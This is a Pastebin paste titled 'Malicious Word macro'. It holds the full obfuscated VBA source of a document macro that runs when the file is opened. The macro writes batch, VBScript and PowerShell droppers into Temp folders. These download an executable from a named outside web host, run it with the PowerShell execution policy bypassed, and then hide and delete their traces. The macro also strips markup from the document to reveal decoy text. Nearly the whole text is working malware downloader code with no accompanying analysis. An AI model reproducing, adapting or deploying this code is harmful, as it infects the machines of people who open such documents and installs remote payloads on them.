Advertisement
dynamoo

Malicious Word macro

Dec 17th, 2014
631
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Sub Auto_Open()
  10.     h
  11. End Sub
  12. Sub h()
  13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
  14.      USER = Environ("username")
  15.      
  16.      PST1 = "adobeacd-update." + "p" + Chr(115) + "1"
  17.      BART = "adobeacd-update" + "." + "b" + Chr(Asc(Chr(Asc("a")))) + Chr(Asc("t"))
  18.      ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
  19.      VBT1 = "adobeacd-update." + Chr(118) + "b" + "s"
  20.      VBTXP = "adobeacd-updatexp" + "." + "v" + Chr(Asc("b")) + "s"
  21.      
  22.      
  23.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  24.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  25.      MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  26.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  27.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  28.      TRT = "c:\Windows\Temp\" + BART
  29.      KRT = TRT
  30.      
  31.       On Error Resume Next
  32.      SetAttr MY_FILENDIR, vbNormal
  33.      
  34.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
  35.       Kill MY_FILENDIR
  36.      End If
  37.      
  38.      On Error Resume Next
  39.      SetAttr MY_FILEDIR, vbNormal
  40.      If (Dir(MY_FILEDIR) <> "") Then
  41.       Kill MY_FILEDIR
  42.      End If
  43.      
  44.      On Error Resume Next
  45.      SetAttr MY_FILDIR, vbNormal
  46.      If (Dir(MY_FILDIR) <> "") Then
  47.       Kill MY_FILDIR
  48.      End If
  49.      
  50.      On Error Resume Next
  51.      SetAttr XPFILEDIR, vbNormal
  52.      If (Dir(XPFILEDIR) <> "") Then
  53.       Kill XPFILEDIR
  54.      End If
  55.      
  56.      Dim FileNumber As Integer
  57.      Dim FileNumb As Integer
  58.      Dim FileNu As Integer
  59.      Dim FileNuG As Integer
  60.      Dim FileNukk As Integer
  61.      Dim mttt As Integer
  62.      Dim retVal As Variant
  63.      'Dim winver As Integer
  64.     FileNumber = FreeFile
  65.      FileNumb = FreeFile
  66.      FileNu = FreeFile
  67.      FileNukk = FreeFile
  68.      FileNuG = FreeFile
  69.      Dim objWMIService As Variant
  70.     Dim colOperatingSystems As Variant
  71.     Dim objOperatingSystem As Variant
  72.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  73.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  74.     For Each objOperatingSystem In colOperatingSystems
  75.         SysReport = SysReport & "The operating system on this computer is " & _
  76.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
  77.     Next
  78.      
  79.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  80.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  81.      For Each objOperatingSystem In colOperatingSystems
  82.         winverstr = objOperatingSystem.Version
  83.     Next
  84.    
  85.    
  86.     winver = Val(winverstr)
  87.     WaitFor (1)
  88.      
  89.  If (winver <= 5.5) Then
  90.      Open KRT For Output As #FileNuG
  91.      Print #FileNuG, "@echo off"
  92.      Print #FileNuG, "ping 1.1.2.2 -n 2"
  93.      Print #FileNuG, ":ksadatk"
  94.      Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
  95.      Print #FileNuG, "ping 1.1.2.2 -n 2"
  96.      Print #FileNuG, "c:\Windows\Temp\444.exe"
  97.      Print #FileNuG, ":loop"
  98.      Print #FileNuG, "ping 1.1.2.2 -n 1"
  99.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  100.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  101.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
  102.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
  103.      Print #FileNuG, "exit"
  104.      Close #FileNuG
  105.      
  106.      WaitFor (2)
  107.      mttt = 88
  108.  
  109.      Open XPFILEDIR For Output As #FileNumber
  110.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.lynxtech.com.hk/images/tn" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  111.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  112.      
  113.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  114.      'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  115.    
  116.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  117.      
  118.      Print #FileNumber, "objXMLHTTP.send() "
  119.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  120.      
  121.      Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
  122.      
  123.      Print #FileNumber, "objADOStream.Open "
  124.      Print #FileNumber, "objADOStream.Type = 1"
  125.      Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
  126.      Print #FileNumber, "objADOStream.Position = 0 "
  127.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
  128.      Print #FileNumber, "objADOStream.Close "
  129.      Print #FileNumber, "Set objADOStream = Nothing "
  130.      Print #FileNumber, "End if "
  131.      Print #FileNumber, "Set objXMLHTTP = Nothing"
  132.      Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
  133.      Close #FileNumber
  134.      
  135.      WaitFor (1)
  136.      
  137.      ASKJD = TRT
  138.      retVal = Shell(ASKJD, 0)
  139.      
  140. End If
  141.  
  142.  
  143. If (winver > 5.5) Then
  144.      Open MY_FILENDIR For Output As #FileNumber
  145.      Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  146.      Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://www.lynxtech.com.hk/images/tn" & ".e" & "x" + "e';"
  147.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  148.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
  149.      Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  150.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  151.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  152.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
  153.      Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
  154.      Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
  155.      Print #FileNumber, "Start-Sleep -s 15;"
  156.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
  157.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  158.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  159.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  160.      Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  161.      Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  162.      Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  163.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  164.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  165.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  166.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  167.      Close #FileNumber
  168.    
  169.     Open MY_FILDIR For Output As #FileNumb
  170.     Print #FileNumb, "Dim dff"
  171.     Print #FileNumb, "dff = 68"
  172.     Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
  173.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  174.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
  175.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  176.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  177.     Close #FileNumb
  178.    
  179.     Open MY_FILEDIR For Output As #FileNukk
  180.     Print #FileNukk, "@echo off"
  181.     Print #FileNukk, "ping 1.1.2.2 -n 2"
  182.     Print #FileNukk, "chcp 1251"
  183.     Print #FileNukk, ":csakclasjdklas"
  184.     Print #FileNukk, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
  185.     Print #FileNukk, "exit"
  186.     Close #FileNukk
  187.        
  188.     SetAttr MY_FILENDIR, vbNormal
  189.     SetAttr MY_FILEDIR, vbNormal
  190.     SetAttr MY_FILDIR, vbNormal
  191.      
  192.     WaitFor (1)
  193.     SJAKLD = MY_FILEDIR
  194.     retVal = Shell(SJAKLD, 0)
  195. End If
  196.  
  197.      
  198.      findTest
  199.     secondTest
  200.     For Each myStoryRange In ActiveDocument.StoryRanges
  201.     With myStoryRange.Find
  202.         .Text = "<" & "sel" & "ect>"
  203.         .Replacement.Text = " "
  204.         .Wrap = wdFindContinue
  205.         .Execute Replace:=wdReplaceAll
  206.     End With
  207.     Next myStoryRange
  208.  
  209.     For Each myStoryRange In ActiveDocument.StoryRanges
  210.     With myStoryRange.Find
  211.         .Text = "</s" & "ele" & "ct>"
  212.         .Replacement.Text = " "
  213.         .Wrap = wdFindContinue
  214.         .Execute Replace:=wdReplaceAll
  215.     End With
  216.     Next myStoryRange
  217.    
  218.     For Each myStoryRange In ActiveDocument.StoryRanges
  219.     With myStoryRange.Find
  220.         .Text = "<" & "in" & "box>"
  221.         .Replacement.Text = " "
  222.         .Wrap = wdFindContinue
  223.         .Execute Replace:=wdReplaceAll
  224.     End With
  225.     Next myStoryRange
  226.  
  227.     For Each myStoryRange In ActiveDocument.StoryRanges
  228.     With myStoryRange.Find
  229.         .Text = "</" & "in" & "box>"
  230.         .Replacement.Text = " "
  231.         .Wrap = wdFindContinue
  232.         .Execute Replace:=wdReplaceAll
  233.     End With
  234.     Next myStoryRange
  235.      
  236.  
  237. End Sub
  238. Sub WaitFor(NumOfSeconds As Long)
  239. Dim SngSec As Long
  240. SngSec = Timer + NumOfSeconds
  241.  
  242. Do While Timer < SngSec
  243. DoEvents
  244. Loop
  245.  
  246. End Sub
  247.  
  248. Sub AutoOpen()
  249.     Auto_Open
  250. End Sub
  251. Sub Workbook_Open()
  252.     Auto_Open
  253. End Sub
  254. Sub findTest()
  255. Dim firstTerm As String
  256. Dim secondTerm As String
  257. Dim rrtt As Range
  258. Dim selRange As Range
  259. Dim selectedText As String
  260.  
  261. Set rrtt = ActiveDocument.Range
  262. firstTerm = "<se" & "lect>"
  263. secondTerm = "</sel" & "ect>"
  264. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  265. With rrtt.Find
  266. .Text = firstTerm
  267. .MatchWholeWord = True
  268. .Execute
  269. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
  270. rrtt.Collapse direction:=wdCollapseEnd
  271. Set selRange = ActiveDocument.Range
  272. selRange.Start = rrtt.End
  273. .Text = secondTerm
  274. .MatchWholeWord = True
  275. .Execute
  276. ASKSASADW = "asjldklas"
  277. rrtt.Collapse direction:=wdCollapseStart
  278. selRange.End = rrtt.Start
  279. selectedText = selRange.Delete
  280. End With
  281. End Sub
  282.  
  283. Sub secondTest()
  284. Dim firstTerm As String
  285. Dim secondTerm As String
  286. Dim myRanget As Range
  287. Dim yytt As Range
  288. Dim selRanget As Range
  289. Dim selectedTextt As String
  290.  
  291. Set yytt = ActiveDocument.Range
  292. firstTerm = "<in" & "box>"
  293. secondTerm = "</in" & "box>"
  294. ASKIEJSASAHBDJ = "ask as8d j asdasl;a skdjasdnkjh12kh1 sad"
  295. With yytt.Find
  296. .Text = firstTerm
  297. .MatchWholeWord = True
  298. .Execute
  299. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
  300. yytt.Collapse direction:=wdCollapseEnd
  301. ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a skdjasdnkjh12kh1 sad"
  302. Set selRanget = ActiveDocument.Range
  303. selRanget.Start = yytt.End
  304. .Text = secondTerm
  305. .MatchWholeWord = True
  306. .Execute
  307. ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a skdjasdnkjh12kh1 sad"
  308. yytt.Collapse direction:=wdCollapseStart
  309. selRanget.End = yytt.Start
  310. selectedTextt = selRanget
  311. selRanget.Font.Color = wdColorBlack
  312. End With
  313. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement